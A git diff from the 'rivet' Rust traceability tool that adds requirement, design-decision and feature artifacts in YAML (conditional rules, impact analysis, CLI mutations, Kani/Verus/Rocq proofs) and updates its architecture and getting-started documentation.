Proving validation soundness and completeness is the + key property for ISO 26262 TCL 1 tool qualification. No other + traceability tool has this level of correctness evidence. + alternatives: > + Creusot (Why3-based). Similar capability but less Rust-native + integration. Prusti (Viper-based). Less mature for complex + data structures. Both viable but Verus has the strongest + Rust integration story. + + - id: DD-027 + type: design-decision + title: Rocq metamodel proofs for schema semantics + status: draft + description: > + Schema semantics (traceability rule systems, conditional rules, + link type algebra) are modeled in Rocq via coq-of-rust translation. + Properties proven include schema satisfiability, rule consistency, + monotonicity, and ASPICE V-model completeness. Rocq proofs serve + as the formal specification against which the Rust implementation + is validated. + tags: [formal-verification, rocq, metamodel] + links: + - type: satisfies + target: REQ-030 + fields: + rationale: > + Rocq provides the deepest level of assurance — proving that the + validation rules themselves are mathematically consistent, not + just that the implementation is correct. Schema satisfiability + (rules don't contradict) is a property that cannot be proven + by testing or bounded model checking because it requires + universal quantification over all possible artifact configurations. + coq-of-rust translates Rust types to Rocq for specification. + alternatives: > + Lean4 via Aeneas translation. Viable alternative with better + metaprogramming but less Rust tooling maturity. F* via hacspec. + Good for cryptographic properties but less natural for domain + modeling. 
diff --git a/artifacts/features.yaml b/artifacts/features.yaml index 0961621..4b10454 100644 --- a/artifacts/features.yaml +++ b/artifacts/features.yaml @@ -299,7 +299,7 @@ artifacts: - id: FEAT-020 type: feature title: AADL browser rendering (spar WASM) - status: draft + status: approved description: > Render AADL component diagrams in the dashboard using a spar WASM module compiled for the browser. Provides interactive visualization @@ -577,3 +577,479 @@ artifacts: - type: satisfies target: REQ-020 tags: [cross-repo, dashboard] + + - id: FEAT-040 + type: feature + title: Conditional validation rules in schema YAML + status: draft + description: > + Extend schema YAML with conditional-rules block supporting when/then + syntax. The "when" clause matches field values (equals, matches regex, + exists). The "then" clause enforces required-fields and required-links. + Validation engine evaluates conditional rules after static rules. + tags: [validation, schema, phase-3] + links: + - type: satisfies + target: REQ-023 + - type: implements + target: DD-018 + fields: + phase: phase-3 + + - id: FEAT-041 + type: feature + title: "rivet impact command" + status: draft + description: > + Change impact analysis command that computes content hashes for all + artifacts, diffs against a baseline (commit, tag, or rivet.lock), + and walks the link graph to report transitively affected artifacts. + Supports --since, --baseline, and --format json flags. Dashboard + integration highlights impacted artifacts in graph and matrix views. + tags: [cli, traceability, baseline, phase-3] + links: + - type: satisfies + target: REQ-024 + - type: implements + target: DD-019 + fields: + phase: phase-3 + + - id: FEAT-042 + type: feature + title: sphinx-needs JSON adapter (needs-json) + status: draft + description: > + Import adapter for sphinx-needs needs.json export format. 
Reads + needs.json, applies configurable type-mapping and id-transform + rules from rivet.yaml, and produces rivet artifacts with mapped + types, converted links, and preserved fields. Handles sphinx-needs + specifics like nested content, docname metadata, and underscore IDs. + tags: [adapter, interchange, migration, phase-3] + links: + - type: satisfies + target: REQ-025 + - type: implements + target: DD-020 + fields: + phase: phase-3 + + - id: FEAT-043 + type: feature + title: Test traceability source scanner + status: draft + description: > + Scans test source code for rivet traceability markers (Rust attributes, + Python decorators, comment tags) and test result files (JUnit XML, + cargo test JSON). Injects ephemeral test nodes into the link graph + with verifies links to referenced artifacts. Supports configurable + marker patterns per language and a coverage report via + rivet coverage --tests. + tags: [testing, traceability, automation, phase-3] + links: + - type: satisfies + target: REQ-026 + - type: implements + target: DD-021 + fields: + phase: phase-3 + + - id: FEAT-044 + type: feature + title: Build-system dependency providers + status: draft + description: > + Pluggable providers that read cross-repo dependency information from + build system manifests. Bazel provider parses MODULE.bazel for + bazel_dep() and git_override() entries. Nix provider parses flake.lock + for input pins. Custom JSON provider reads SCORE-style known_good.json. + All providers resolve repo URLs, pinned commits, and workspace paths + for use by cross-repo linking and source code traceability scanning. 
+ tags: [cross-repo, bazel, nix, phase-3] + links: + - type: satisfies + target: REQ-027 + - type: implements + target: DD-022 + fields: + phase: phase-3 + + - id: FEAT-045 + type: feature + title: "rules_rivet Bazel module and Nix flake" + status: draft + description: > + Distribute rivet as a Bazel module (rules_rivet) with a rivet_validate() + test rule, and as a Nix flake with binary package output. The Bazel rule + runs rivet validate as a bazel test target without pulling Sphinx, Python, + LLVM, or JDK into the dependency graph. The Nix flake provides + nix run and nix develop integration. + tags: [packaging, bazel, nix, phase-3] + links: + - type: satisfies + target: REQ-027 + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-057 + type: feature + title: SVG graph viewer with fullscreen, resize, and pop-out + status: draft + description: > + Dashboard SVG graph views (link graph, STPA control structure, AADL + diagrams) get a dedicated viewer with fullscreen toggle (F11 or button), + pop-out to separate browser window, resizable container with drag + handles, zoom-to-fit button, and minimap for large graphs. Currently + SVGs are rendered inline with fixed dimensions and no way to enlarge + or isolate them. + tags: [dashboard, ui, graph, phase-3] + links: + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-052 + type: feature + title: "rivet add — create artifacts from CLI" + status: draft + description: > + Create a new artifact from the command line with schema validation. + Auto-generates next available ID for the given type/prefix pattern. + Validates type exists in schema, required fields are present, status + is in allowed values. Appends to the appropriate YAML file based on + artifact type. Supports --type, --title, --status, --tags, --field, + and --description flags. Interactive mode prompts for required fields. 
+ tags: [cli, mutation, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-053 + type: feature + title: "rivet modify — update artifact fields from CLI" + status: draft + description: > + Modify an existing artifact's fields, status, tags, title, or + description from the command line. Validates the artifact exists, + the new values conform to schema (allowed values, field types), + and the modification doesn't break link constraints. Supports + --set-field, --set-status, --set-title, --add-tag, --remove-tag. + tags: [cli, mutation, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-054 + type: feature + title: "rivet remove — delete artifacts from CLI" + status: draft + description: > + Remove an artifact by ID from its YAML file. Pre-validates that + no other artifacts link to the target (or --force to override + with a warning listing affected links). Updates the link graph + and reports any newly broken references. Refuses to remove + artifacts that are targets of traceability rules unless --force. + tags: [cli, mutation, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: satisfies + target: SC-2 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-055 + type: feature + title: "rivet link / unlink — manage artifact links from CLI" + status: draft + description: > + Add or remove links between artifacts from the command line. + rivet link --type --target + validates that both artifacts exist, the link type exists in + the schema, the link type is valid for the source and target + artifact types, and cardinality constraints are not violated. + rivet unlink removes an existing link with the same validations. + Supports cross-repo references (prefix:ID syntax). 
+ tags: [cli, mutation, traceability, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: satisfies + target: SC-1 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-056 + type: feature + title: "rivet next-id — compute next available artifact ID" + status: draft + description: > + Given an artifact type or ID prefix pattern, compute the next + available ID by scanning the store. Useful for scripting and + for the add command's auto-ID feature. rivet next-id --type requirement + returns REQ-031 (or whatever is next). rivet next-id --prefix FEAT + returns FEAT-057. Supports --format json for tooling integration. + tags: [cli, tooling, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-046 + type: feature + title: MODULE.bazel rowan parser with Starlark subset grammar + status: draft + description: > + Hand-written lexer and recursive descent parser for the MODULE.bazel + Starlark subset. Produces rowan GreenNode CST with ~30 SyntaxKind + variants covering module(), bazel_dep(), git_override(), + archive_override(), local_path_override(), keyword arguments, + string/list/boolean literals, and comments. Error recovery produces + partial CST with diagnostic spans on malformed input. + tags: [parsing, rowan, bazel, phase-3] + links: + - type: satisfies + target: REQ-028 + - type: satisfies + target: REQ-027 + - type: implements + target: DD-023 + fields: + phase: phase-3 + + - id: FEAT-047 + type: feature + title: salsa validation database with incremental query groups + status: draft + description: > + Restructure the validation pipeline as salsa tracked queries. + Input queries for file contents, tracked queries for parse_artifacts, + merged_schema, artifact_store, link_graph, evaluate_conditional_rules, + and validate. Phased adoption alongside existing serde_yaml pipeline + with feature flag for opt-in. 
Enables incremental revalidation, + free change impact analysis, and LSP-ready architecture. + tags: [validation, salsa, architecture, phase-3] + links: + - type: satisfies + target: REQ-029 + - type: satisfies + target: REQ-023 + - type: implements + target: DD-024 + fields: + phase: phase-3 + + - id: FEAT-048 + type: feature + title: Conditional rule evaluation as salsa tracked queries + status: draft + description: > + Conditional validation rules (when/then syntax in schema YAML) + evaluated as individual salsa tracked queries per artifact-rule pair. + salsa dependency tracking ensures only affected rules re-evaluate + when an artifact field changes. Schema extension with + conditional-rules block supporting field equality, regex matching, + and existence checks in the when clause, and required-fields and + required-links in the then clause. + tags: [validation, schema, salsa, phase-3] + links: + - type: satisfies + target: REQ-023 + - type: implements + target: DD-018 + - type: implements + target: DD-024 + fields: + phase: phase-3 + + - id: FEAT-049 + type: feature + title: Kani proof harnesses for core algorithms + status: draft + description: > + 10-15 Kani proof harnesses proving panic freedom for core algorithms. + Targets: LinkGraph::build, parse_artifact_ref, Schema::merge, + validate cardinality checks, detect_circular_deps, MODULE.bazel + parser. CI job running Kani verification. Complements existing + proptest (random) and Miri (UB) with exhaustive bounded checking. + tags: [formal-verification, kani, testing, phase-3] + links: + - type: satisfies + target: REQ-030 + - type: implements + target: DD-025 + fields: + phase: phase-3 + + - id: FEAT-050 + type: feature + title: Verus soundness and completeness proofs for validation + status: draft + description: > + Verus requires/ensures annotations on core validation functions + proving soundness (PASS implies all rules satisfied) and completeness + (rule violated implies diagnostic emitted). 
Additional proofs for + backlink symmetry, conditional rule consistency, and reachability + correctness. Inline Rust annotations with SMT-based proof discharge. + tags: [formal-verification, verus, testing, future] + links: + - type: satisfies + target: REQ-030 + - type: implements + target: DD-026 + fields: + phase: future + + - id: FEAT-051 + type: feature + title: Rocq metamodel specification and satisfiability proofs + status: draft + description: > + Schema semantics modeled in Rocq via coq-of-rust translation of + Schema, TraceabilityRule, and ConditionalRule types. Theorems proven + for schema satisfiability (rules not contradictory), monotonicity + (adding artifacts preserves validity), link graph well-foundedness + (validation terminates), and ASPICE V-model completeness (schema + enforces full traceability chain). Serves as formal specification + for ISO 26262 TCL 1 tool qualification evidence. + tags: [formal-verification, rocq, metamodel, future] + links: + - type: satisfies + target: REQ-030 + - type: implements + target: DD-027 + fields: + phase: future + + - id: FEAT-052 + type: feature + title: LSP server for IDE integration + status: approved + description: > + Language Server Protocol server providing diagnostics (inline + validation errors/warnings), hover information (artifact metadata + preview), and go-to-definition navigation (jump to artifact + definitions) for YAML artifact files. Runs via `rivet lsp` on + stdin/stdout. + tags: [lsp, ide, developer-experience, phase-3] + links: + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-053 + type: feature + title: SCORE metamodel schema + status: approved + description: > + Eclipse SCORE metamodel as a rivet schema, enabling validation of + SCORE project artifacts. Defines artifact types for the SCORE + V-model (TSF, workflows, requirements, components, FMEA/DFA, + test specs) with ASPICE-aligned traceability rules. 
+ tags: [score, schema, eclipse, phase-3] + links: + - type: satisfies + target: REQ-010 + fields: + phase: phase-3 + + # --- AI agent ergonomics (from agent testing feedback) --- + + - id: FEAT-054 + type: feature + title: "rivet add --link: create artifact with links in one command" + status: draft + description: > + Allow --link "type:target" flags on rivet add to create an artifact + with links in a single command. Eliminates the 2-3 follow-up rivet + link calls needed per artifact today. Biggest friction point for + AI agent workflows creating 20+ artifacts. + tags: [cli, agent-ergonomics, mutations, phase-3] + links: + - type: satisfies + target: REQ-031 + fields: + phase: phase-3 + + - id: FEAT-055 + type: feature + title: "rivet batch: apply multiple mutations from YAML/JSON file" + status: draft + description: > + Batch mode that reads a YAML/JSON file of mutations (add, modify, + link, remove) and applies them atomically. Bridges the gap between + single-command CLI and hand-editing YAML for large artifact chains + (e.g., 20 artifacts + 40 links in one file). + tags: [cli, agent-ergonomics, mutations, phase-3] + links: + - type: satisfies + target: REQ-031 + fields: + phase: phase-3 + + - id: FEAT-056 + type: feature + title: "JSON output for validate, coverage, context, and diff" + status: draft + description: > + Add --format json flag to validate, coverage, context, and diff + commands. Machine-readable output lets AI agents parse results + programmatically without regex. JSON schema documented so agents + know the structure. + tags: [cli, agent-ergonomics, json, phase-3] + links: + - type: satisfies + target: REQ-042 + fields: + phase: phase-3 + + - id: FEAT-057 + type: feature + title: "rivet graph --depth N: local link neighborhood CLI" + status: draft + description: > + CLI command to show the link neighborhood of a specific artifact + within N hops. Prints upstream and downstream chain as a tree. 
+ More focused than rivet matrix for investigating one artifact. + tags: [cli, graph, traceability, phase-3] + links: + - type: satisfies + target: REQ-004 + fields: + phase: phase-3 + + - id: FEAT-058 + type: feature + title: "rivet scaffold --chain: generate traceability skeleton" + status: draft + description: > + Given a root artifact and a sequence of types, generate draft + artifacts with the correct links forming a traceability chain. + E.g., rivet scaffold --chain CG-1 --through + "cybersecurity-req,cybersecurity-design,cybersecurity-implementation, + cybersecurity-verification" creates 4 linked draft artifacts. + tags: [cli, agent-ergonomics, automation, phase-3] + links: + - type: satisfies + target: REQ-031 + fields: + phase: phase-3 diff --git a/artifacts/requirements.yaml b/artifacts/requirements.yaml index af717f0..c190973 100644 --- a/artifacts/requirements.yaml +++ b/artifacts/requirements.yaml @@ -287,3 +287,340 @@ artifacts: fields: priority: should category: functional + + - id: REQ-023 + type: requirement + title: Conditional validation rules + status: draft + description: > + The validation engine must support conditional rules where field + requirements or link cardinality depend on the value of another field. + For example, an artifact with status "approved" must have a non-empty + verification-criteria field, or an artifact with safety level ASIL_B + must have mitigated_by links. This enables safety-critical constraint + enforcement that static per-type validation cannot express. + Contradictory conditional rules must be detected at schema load time. 
+ tags: [validation, schema, safety] + links: + - type: satisfies + target: SC-12 + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/docs-as-code#180" + + - id: REQ-024 + type: requirement + title: Change impact analysis + status: draft + description: > + The system must detect which artifacts changed between two baselines + or commits and compute the transitive set of downstream artifacts + affected via the link graph. This supports change management workflows + required by ASPICE SUP.10 and ISO 26262 part 8. + tags: [traceability, baseline, safety] + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/docs-as-code#314, eclipse-score/process_description#535" + + - id: REQ-025 + type: requirement + title: sphinx-needs JSON import + status: draft + description: > + The system must import artifacts from the sphinx-needs needs.json + export format, mapping sphinx-needs types, links, and fields to + rivet schema types via configurable mappings. This provides a + migration path for projects using sphinx-needs-based toolchains. + tags: [interchange, adapter, migration] + fields: + priority: should + category: interface + upstream-ref: "eclipse-score/score#1695" + + - id: REQ-026 + type: requirement + title: Test-to-requirement traceability extraction + status: draft + description: > + The system must extract traceability markers from test source code + and test results, linking test cases to requirements without requiring + manual YAML maintenance. Must support language-specific markers + (attributes, decorators, comments) and test result formats (JUnit XML, + cargo test JSON). 
+ tags: [testing, traceability, automation] + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/score#2521, eclipse-score/score#2619" + + - id: REQ-027 + type: requirement + title: Build-system-aware cross-repo discovery + status: draft + description: > + The system must discover cross-repo dependencies from build system + manifests (Bazel MODULE.bazel, Nix flake.lock, or custom manifests) + rather than requiring manual external declarations. This includes + resolving pinned commits, workspace paths, and source code locations + across the dependency graph for traceability validation and source + code linking. + tags: [cross-repo, bazel, nix, traceability] + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/reference_integration (known_good.json)" + + - id: REQ-028 + type: requirement + title: Diagnostic-quality parsing with lossless syntax trees + status: draft + description: > + All parsers for build-system manifests and configuration files must + produce lossless concrete syntax trees (CST) with full span information + for byte-exact error reporting. Parsers must recover from errors and + produce partial results rather than failing completely. Uses rowan + for CST representation, consistent with the spar AADL toolchain. + tags: [parsing, rowan, diagnostics] + links: + - type: satisfies + target: SC-13 + fields: + priority: must + category: non-functional + + - id: REQ-029 + type: requirement + title: Incremental validation via dependency-tracked computation + status: draft + description: > + The validation pipeline must support incremental recomputation where + changing a single artifact file only re-evaluates affected validation + rules, link graph edges, and coverage computations. Uses salsa for + dependency tracking, consistent with the spar AADL toolchain. This + enables sub-millisecond revalidation for IDE integration and efficient + conditional rule evaluation. 
Incremental results must be identical + to full validation results for the same inputs. + tags: [validation, salsa, incremental, performance] + links: + - type: satisfies + target: SC-11 + fields: + priority: must + category: non-functional + + - id: REQ-031 + type: requirement + title: Schema-validated artifact mutation from CLI + status: draft + description: > + The CLI must provide commands to create, modify, remove, link, and + unlink artifacts directly, with full schema validation at write time. + All mutations must validate the artifact ID is unique (or exists for + modify), the type exists in the loaded schema, required fields are + present, link targets exist, link types are valid for the source and + target types, and status values are in the allowed set. The CLI must + write valid YAML that preserves existing file formatting and comments + where possible. This eliminates the need for external agents or manual + YAML editing to maintain artifacts correctly. + tags: [cli, mutation, validation, safety] + links: + - type: satisfies + target: SC-1 + - type: satisfies + target: SC-2 + fields: + priority: must + category: functional + + - id: REQ-030 + type: requirement + title: Formal correctness guarantees for validation engine + status: draft + description: > + Core validation algorithms must have formal correctness proofs at + three levels. Bounded model checking (Kani) for panic freedom. + Functional correctness proofs (Verus) for validation soundness + and completeness. Metamodel semantic proofs (Rocq/coq-of-rust) + for schema satisfiability and rule consistency. These proofs + serve as ISO 26262 tool qualification evidence at TCL 1. + Proofs must verify the actual implementation, not a separate model. 
+ tags: [formal-verification, safety, tool-qualification] + links: + - type: satisfies + target: SC-14 + fields: + priority: should + category: non-functional + + - id: REQ-032 + type: requirement + title: Markdown rendering in artifact descriptions + status: approved + description: > + Artifact descriptions rendered as CommonMark HTML via pulldown-cmark with tables, strikethrough, task lists, and code blocks. + tags: [rendering, markdown] + fields: + category: functional + priority: should + + - id: REQ-033 + type: requirement + title: Rich artifact embedding in documents with schema-driven link traversal + status: approved + description: > + Document embeds support modifiers (full, links, upstream, downstream, chain, table) with schema-driven link traversal. + tags: [documents, embedding, traceability] + fields: + category: functional + priority: should + + - id: REQ-034 + type: requirement + title: YAML 1.2.2 spec-compliant artifact file editing + status: approved + description: > + YAML artifact file editing uses indentation-aware parser per YAML 1.2.2 spec for lossless modification. + tags: [yaml, parsing, spec-compliance] + fields: + category: functional + priority: must + links: + - type: satisfies + target: SC-2 + + - id: REQ-035 + type: requirement + title: HTML export includes rendered documents with resolved embeds + status: approved + description: > + HTML export includes rendered documents with resolved wiki-links and artifact embeds as static pages. + tags: [export, documents] + fields: + category: functional + priority: must + + - id: REQ-036 + type: requirement + title: HTML export supports version switcher and homepage link + status: approved + description: > + HTML export supports runtime config.js for version switcher dropdown and homepage back-link. 
+ tags: [export, navigation, versioning] + fields: + category: functional + priority: should + + - id: REQ-037 + type: requirement + title: Source code implementation traceability scanning + status: draft + description: > + The system must scan source code files (not just tests) for inline + traceability markers that link implementation code to artifacts. + Must support comment-based markers across multiple languages + (e.g., // Implements: REQ-001, # Satisfies: DD-005). Discovered + markers are injected as ephemeral nodes into the link graph, + following the same pattern as commit traceability (REQ-017) and + test traceability (REQ-026). This closes the gap between YAML + artifact specifications and actual implementation code. + tags: [traceability, source-code, automation] + fields: + priority: should + category: functional + upstream-ref: "OpenFastTrace source-code tag scanning (30+ languages)" + + - id: REQ-038 + type: requirement + title: Artifact revision tracking with link staleness detection + status: draft + description: > + Each artifact must carry a revision indicator (hash or explicit + version). When an artifact's content changes, all links targeting + that artifact from downstream artifacts must be flagged as stale + until the downstream artifact is reviewed and its link confirmed. + This is distinct from change impact analysis (REQ-024) which + operates between baselines — staleness operates per-link and + persists until explicitly cleared. Required by ISO 26262 part 8 + change management and ASPICE SUP.10. 
+ tags: [traceability, change-management, safety] + fields: + priority: should + category: functional + upstream-ref: "OpenFastTrace revision-based outdated/predated link detection" + + - id: REQ-039 + type: requirement + title: Deep recursive coverage analysis + status: draft + description: > + The coverage engine must distinguish between shallow coverage + (direct covering link exists) and deep coverage (covering item + is itself fully covered, recursively). An artifact is deeply + covered only when all required covering items are themselves + deeply covered. Cycle detection must prevent infinite recursion. + This catches situations where a test covers a requirement, but + the test itself has unmet coverage needs at a lower level. + tags: [validation, coverage, traceability] + fields: + priority: should + category: functional + upstream-ref: "OpenFastTrace deep vs shallow coverage distinction" + + - id: REQ-040 + type: requirement + title: Variant and product-line artifact filtering + status: draft + description: > + Artifacts must support variant annotations that declare which + product variants or configurations an artifact applies to. + Validation, coverage, and matrix commands must accept a variant + filter that restricts the artifact graph to a specific variant. + This enables product-line engineering where a platform shares + most requirements but variants diverge on specifics. Variant + definitions are declared in rivet.yaml; artifacts reference + variants via a field or tag convention. + tags: [product-line, automotive, filtering] + fields: + priority: should + category: functional + upstream-ref: "sphinx-needs needs_variants for product-line engineering" + + - id: REQ-041 + type: requirement + title: Artifact overlay files + status: draft + description: > + The system must support overlay files that extend existing + artifacts without modifying the original source file. 
An overlay + can add tags, links, fields, or status changes to artifacts + defined in another file. Overlays are merged at load time and + validated against the schema like any other mutation. This + enables multi-team workflows where a safety team adds safety + tags or links to artifacts owned by the development team without + editing their files. + tags: [multi-team, extensibility, workflow] + fields: + priority: could + category: functional + upstream-ref: "sphinx-needs needextend directive for post-hoc modification" + + - id: REQ-042 + type: requirement + title: Structured export for external visualization tools + status: draft + description: > + The system must export artifact data, coverage metrics, and + traceability graphs in formats consumable by external visualization + and BI tools. This includes metrics JSON (artifact counts by + type/status, coverage percentages per rule, validation summary) + for Grafana or Power BI dashboards, and PlantUML source for + traceability graph rendering. The goal is integration with + existing visualization ecosystems rather than building charting + capabilities into rivet itself. 
+ tags: [export, integration, visualization] + fields: + priority: could + category: interface + upstream-ref: "sphinx-needs PlantUML/Matplotlib visualizations — plugin approach instead" diff --git a/clippy.toml b/clippy.toml index b339f7c..f2c7fb1 100644 --- a/clippy.toml +++ b/clippy.toml @@ -1 +1 @@ -msrv = "1.85" +msrv = "1.89" diff --git a/docs/architecture.md b/docs/architecture.md index a054675..a613822 100644 --- a/docs/architecture.md +++ b/docs/architecture.md @@ -85,14 +85,22 @@ root: RivetSystem::RivetCli.Impl | `oslc` | OSLC client for discovery, query, CRUD, and sync (feature-gated) | | `wasm_runtime` | WASM component adapter runtime (feature-gated) | | `error` | Unified error type for the library | -| `formats/` | Format-specific adapters: `generic` (YAML), `stpa` (STPA YAML) | +| `formats/` | Format-specific adapters: `generic` (YAML), `stpa` (STPA YAML), `aadl` (spar JSON) | +| `embedded` | Embedded schema fallback for bundled schema access | +| `externals` | Cross-repository artifact linking | +| `lifecycle` | Artifact lifecycle state management | +| `commits` | Git commit traceability tracking | +| `proofs` | Kani bounded model checking proof harnesses | ### 2.2 rivet-cli Modules | Module | Purpose | |---------|----------------------------------------------------------------------| -| `main` | CLI entry point, clap argument parsing, subcommand dispatch | -| `serve` | axum HTTP server with HTMX-rendered dashboard pages | +| `main` | CLI entry point, clap argument parsing, subcommand dispatch | +| `serve` | axum HTTP server with HTMX-rendered dashboard pages | +| `lsp` | Language Server Protocol server (diagnostics, hover, go-to-definition) | +| `docs` | Documentation generation and browser commands | +| `schema_cmd` | Schema subcommand handling (list, show, verify) | ## 3. 
Data Flow @@ -266,13 +274,11 @@ traceability-rules: ### 5.2 Available Schemas -| Schema | Types | Link Types | Rules | Domain | -|-----------------|-------|------------|-------|--------------------------------| -| `common` | 0 | 9 | 0 | Base fields and link types | -| `dev` | 3 | 1 | 2 | Development tracking | -| `stpa` | 10 | 5 | 7 | STPA safety analysis | -| `aspice` | 14 | 2 | 10 | ASPICE v4.0 V-model | -| `cybersecurity` | 10 | 2 | 10 | SEC.1-4, ISO/SAE 21434 | +See [schemas.md](schemas.md) for the canonical schema reference table with +current type, link, and rule counts. Available schemas: `common` (base), +`dev` (requirements/features), `stpa` (safety analysis), `aspice` +(Automotive SPICE V-model), `cybersecurity` (SEC.1-4 / ISO 21434), `aadl` +(AADL architecture via spar). ### 5.3 Merge Semantics @@ -309,7 +315,103 @@ This architecture reflects the following key decisions: - [[DD-009]] -- Criterion benchmarks as KPI baselines - [[DD-010]] -- ASPICE 4.0 terminology and composable cybersecurity schema -## 8. Requirements Coverage +## 8. Phase 3 Architecture Extensions + +### 8.1 Incremental Validation (rowan + salsa) + +The validation pipeline (section 3) will be restructured as salsa tracked +queries ([[REQ-029]], [[DD-024]]). Each step in the current sequential +pipeline becomes a salsa query with automatic dependency tracking: + +``` +artifact_source(file) → parse_artifacts(file) → artifact_store() + ↓ ↓ +merged_schema() ────────────────→ evaluate_conditional_rules() + ↓ + link_graph() → validate() +``` + +When a file changes, salsa re-evaluates only affected queries. 
This enables: +- Sub-millisecond incremental revalidation for IDE integration +- Free change impact analysis ([[REQ-024]], [[DD-019]]) — impacted artifacts + are exactly the invalidated salsa queries +- Conditional rule evaluation ([[REQ-023]], [[DD-018]]) — rules re-fire only + when their dependent fields change + +rowan ([[REQ-028]], [[DD-023]]) provides lossless CST for new parsers +(MODULE.bazel, future schema/artifact parsers). Same architecture as spar. + +**STPA coverage:** H-9 (stale incremental results), SC-11 (incremental must +equal full validation), UCA-C-10..C-14, CC-C-10..C-14. + +### 8.2 CLI Mutation Commands + +New subcommands ([[REQ-031]], [[DD-028]]) for schema-validated artifact +mutation: `add`, `modify`, `remove`, `link`, `unlink`, `next-id`. + +Architecture: new `rivet-core/src/mutate.rs` module with `validate_mutation()` +pre-check before any file write. All mutations go through the full schema and +store validation before touching disk. + +**STPA coverage:** Satisfies SC-1 (validate cross-references before output) +and SC-2 (never silently discard artifacts). + +### 8.3 Build-System Integration + +Build-system providers ([[REQ-027]], [[DD-022]]) discover cross-repo +dependencies from Bazel MODULE.bazel or Nix flake.lock. The MODULE.bazel +parser ([[FEAT-046]]) uses rowan for a Starlark subset CST. + +Bazel integration path: +1. Parse MODULE.bazel directly (no Bazel install needed, rowan CST) +2. Optional: shell out to `bazel mod graph --output json` for resolved paths +3. Resolve external repo filesystem paths via `output_base/external/` + +Nix integration: parse `flake.lock` JSON with serde_json. + +Distribution: `rules_rivet` Bazel module and Nix flake ([[FEAT-045]]). + +**STPA coverage:** H-11 (parser misparse), SC-13 (reject unrecognized +constructs), UCA-C-15..C-17, CC-C-15..C-17. + +### 8.4 Formal Verification + +Three-layer verification pyramid ([[REQ-030]]): + +1. 
**Kani** ([[DD-025]], [[FEAT-049]]) — bounded model checking for panic + freedom. 10-15 proof harnesses for core algorithms. New CI job. +2. **Verus** ([[DD-026]], [[FEAT-050]]) — inline functional correctness proofs. + Validation soundness (PASS → all rules satisfied) and completeness (rule + violated → diagnostic emitted). +3. **Rocq** ([[DD-027]], [[FEAT-051]]) — metamodel semantic proofs via + coq-of-rust. Schema satisfiability, rule consistency, ASPICE V-model + completeness. + +**STPA coverage:** H-12 (proof-model divergence), SC-14 (proofs verify actual +implementation). + +### 8.5 Conditional Validation Rules + +Schema extension ([[REQ-023]], [[DD-018]], [[FEAT-040]]) with `when`/`then` +syntax for state-dependent validation. Rule consistency checking at schema +load time per SC-12. + +**STPA coverage:** H-10 (contradictory rules), SC-12 (verify rule consistency +before applying), UCA-C-12, CC-C-12. + +### 8.6 sphinx-needs Migration Path + +needs.json import adapter ([[REQ-025]], [[DD-020]], [[FEAT-042]]) with +configurable type mapping. SCORE metamodel as a rivet schema. Enables +zero-friction evaluation for sphinx-needs projects. + +### 8.7 Test-to-Requirement Traceability + +Source scanner ([[REQ-026]], [[DD-021]], [[FEAT-043]]) extracting traceability +markers from test code. Ephemeral injection into the link graph, same pattern +as commit traceability ([[DD-012]]). + +## 9. 
Requirements Coverage This document addresses the following requirements: @@ -321,3 +423,12 @@ This document addresses the following requirements: - [[REQ-008]] -- WASM component adapters (section 3.2) - [[REQ-009]] -- Test results as release evidence (section 6) - [[REQ-010]] -- Schema-driven validation (section 5) +- [[REQ-023]] -- Conditional validation rules (section 8.5) +- [[REQ-024]] -- Change impact analysis (section 8.1) +- [[REQ-025]] -- sphinx-needs JSON import (section 8.6) +- [[REQ-026]] -- Test-to-requirement traceability (section 8.7) +- [[REQ-027]] -- Build-system-aware cross-repo discovery (section 8.3) +- [[REQ-028]] -- Diagnostic-quality parsing with rowan (section 8.1) +- [[REQ-029]] -- Incremental validation via salsa (section 8.1) +- [[REQ-030]] -- Formal correctness guarantees (section 8.4) +- [[REQ-031]] -- Schema-validated CLI mutation (section 8.2) diff --git a/docs/getting-started.md b/docs/getting-started.md index 1d774dd..ec3bf7b 100644 --- a/docs/getting-started.md +++ b/docs/getting-started.md @@ -525,18 +525,22 @@ rivet serve Rivet tracks its own development. The repository root contains: ``` -rivet.yaml # Loads common + dev schemas +rivet.yaml # Loads common + dev + aadl + stpa schemas schemas/ common.yaml # Base link types dev.yaml # requirement, design-decision, feature types + aadl.yaml # AADL architecture types (spar integration) + stpa.yaml # STPA safety analysis types artifacts/ - requirements.yaml # 12 requirements - decisions.yaml # 6 design decisions - features.yaml # 12 features + requirements.yaml # Requirements + decisions.yaml # Design decisions + features.yaml # Features +safety/stpa/ # STPA analysis artifacts ``` -Run `rivet validate` in the repo root to validate 30+ artifacts with traceability -coverage checks. +Run `rivet validate` in the repo root to validate all artifacts with traceability +coverage checks. 
